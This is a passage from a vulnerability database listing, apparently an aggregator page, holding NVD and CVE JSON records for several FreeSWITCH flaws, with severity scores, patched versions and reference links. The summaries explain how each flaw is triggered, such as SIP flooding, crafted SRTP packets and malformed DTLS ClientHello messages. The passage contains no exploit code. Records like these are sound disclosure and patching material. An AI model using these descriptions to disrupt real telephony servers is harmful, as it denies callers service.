"lastModified": "2024-11-21T06:25:37.363",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2021-10-26T14:15:07.807",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-306"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-41145
Vulnerability from fkie_nvd - Published: 2021-10-25 22:15 - Updated: 2024-11-21 06:25
Severity ?
8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/signalwire/freeswitch/releases/tag/v1.10.7 | Release Notes, Third Party Advisory | |
| security-advisories@github.com | https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/signalwire/freeswitch/releases/tag/v1.10.7 | Release Notes, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AC84E752-644B-4E28-8E03-DA7B5C9C2521",
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7."
},
{
"lang": "es",
"value": "FreeSWITCH es una pila de telecomunicaciones definida por software que permite la transformaci\u00f3n digital de los conmutadores de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. FreeSWITCH antes de la versi\u00f3n 1.10.7 es susceptible de denegaci\u00f3n de servicio a trav\u00e9s de la inundaci\u00f3n SIP. Al inundar FreeSWITCH con mensajes SIP, se observ\u00f3 que despu\u00e9s de un n\u00famero de segundos el proceso era matado por el sistema operativo debido al agotamiento de la memoria. Abusando de esta vulnerabilidad, un atacante es capaz de colapsar cualquier instancia de FreeSWITCH inund\u00e1ndola con mensajes SIP, lo que lleva a una denegaci\u00f3n de servicio. El ataque no requiere autenticaci\u00f3n y puede llevarse a cabo a trav\u00e9s de UDP, TCP o TLS. Este problema fue parcheado en la versi\u00f3n 1.10.7"
}
],
"id": "CVE-2021-41145",
"lastModified": "2024-11-21T06:25:35.337",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-10-25T22:15:07.777",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-401"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-41105
Vulnerability from fkie_nvd - Published: 2021-10-25 22:15 - Updated: 2024-11-21 06:25
Severity ?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network. This issue is patched in version 1.10.7.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | http://seclists.org/fulldisclosure/2021/Oct/43 | Exploit, Mailing List, Third Party Advisory | |
| security-advisories@github.com | https://github.com/signalwire/freeswitch/releases/tag/v1.10.7 | Release Notes, Third Party Advisory | |
| security-advisories@github.com | https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2021/Oct/43 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/signalwire/freeswitch/releases/tag/v1.10.7 | Release Notes, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36 | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AC84E752-644B-4E28-8E03-DA7B5C9C2521",
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller\u0027s or the callee\u0027s network. This issue is patched in version 1.10.7."
},
{
"lang": "es",
"value": "FreeSWITCH es una Pila de Telecomunicaciones definida por Software que permite la transformaci\u00f3n digital de los switches de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. Cuando maneja llamadas SRTP, FreeSWITCH versiones anteriores a 1.10.7, es susceptible de una DoS donde las llamadas pueden ser terminadas por atacantes remotos. Este ataque puede ser realizado de forma continua, negando as\u00ed las llamadas encriptadas durante el ataque. Cuando un puerto de medios que est\u00e1 manejando tr\u00e1fico SRTP es inundado con un paquete SRTP especialmente dise\u00f1ado, la llamada es terminada conllevando a una denegaci\u00f3n del servicio. Este problema se reprodujo cuando es usado el mecanismo de intercambio de claves SDES en un entorno SIP, as\u00ed como cuando es usado el mecanismo de intercambio de claves DTLS en un entorno WebRTC. La desconexi\u00f3n de la llamada se produce debido a la l\u00ednea 6331 del archivo fuente \"switch_rtp.c\", que desconecta la llamada cuando el n\u00famero total de errores SRTP alcanza un umbral embebido (100). Al abusar de esta vulnerabilidad, un atacante es capaz de desconectar cualquier llamada en curso que est\u00e9 usando SRTP. El ataque no requiere autenticaci\u00f3n ni ning\u00fan punto de apoyo especial en la red de la persona que llama o de la persona que recibe la llamada. Este problema est\u00e1 parcheado en la versi\u00f3n 1.10.7"
}
],
"id": "CVE-2021-41105",
"lastModified": "2024-11-21T06:25:28.787",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2021-10-25T22:15:07.710",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2023-51443 (GCVE-0-2023-51443)
Vulnerability from cvelistv5 – Published: 2023-12-27 16:30 – Updated: 2025-11-04 18:21
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.
Severity ?
7.5 (High)
CWE
- CWE-703 - Improper Check or Handling of Exceptional Conditions
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.11
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:21:32.334Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6"
},
{
"name": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176393/FreeSWITCH-Denial-Of-Service.html"
},
{
"url": "http://packetstormsecurity.com/files/176311/FreeSWITCH-1.10.10-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/29"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-51443",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-27T15:19:54.460268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-27T15:29:46.844Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-08T16:06:20.244Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6"
},
{
"name": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11"
},
{
"url": "http://packetstormsecurity.com/files/176393/FreeSWITCH-Denial-Of-Service.html"
}
],
"source": {
"advisory": "GHSA-39gv-hq72-j6m6",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-51443",
"datePublished": "2023-12-27T16:30:48.425Z",
"dateReserved": "2023-12-19T13:52:41.787Z",
"dateUpdated": "2025-11-04T18:21:32.334Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-40019 (GCVE-0-2023-40019)
Vulnerability from cvelistv5 – Published: 2023-09-15 19:34 – Updated: 2024-09-25 18:24
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names. When a call in FreeSWITCH completes codec negotiation, the `codec_string` channel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays. By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it. Version 1.10.10 contains a patch for this issue.
Severity ?
7.5 (High)
CWE
- CWE-770 - Allocation of Resources Without Limits or Throttling
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.10
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:24:54.547Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-40019",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-25T18:23:34.223244Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-25T18:24:36.310Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.10"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names. When a call in FreeSWITCH completes codec negotiation, the `codec_string` channel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays. By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it. Version 1.10.10 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-09-15T19:34:32.429Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"source": {
"advisory": "GHSA-gjj5-79p2-9g3q",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-40019",
"datePublished": "2023-09-15T19:34:32.429Z",
"dateReserved": "2023-08-08T13:46:25.242Z",
"dateUpdated": "2024-09-25T18:24:36.310Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-40018 (GCVE-0-2023-40018)
Vulnerability from cvelistv5 – Published: 2023-09-15 19:32 – Updated: 2024-09-25 18:02
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue.
Severity ?
7.5 (High)
CWE
- CWE-787 - Out-of-bounds Write
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.10
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:24:54.689Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-40018",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-25T18:02:51.253210Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-25T18:02:59.227Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.10"
}
]
}
],
"descriptions": [
{
"lang": "en",
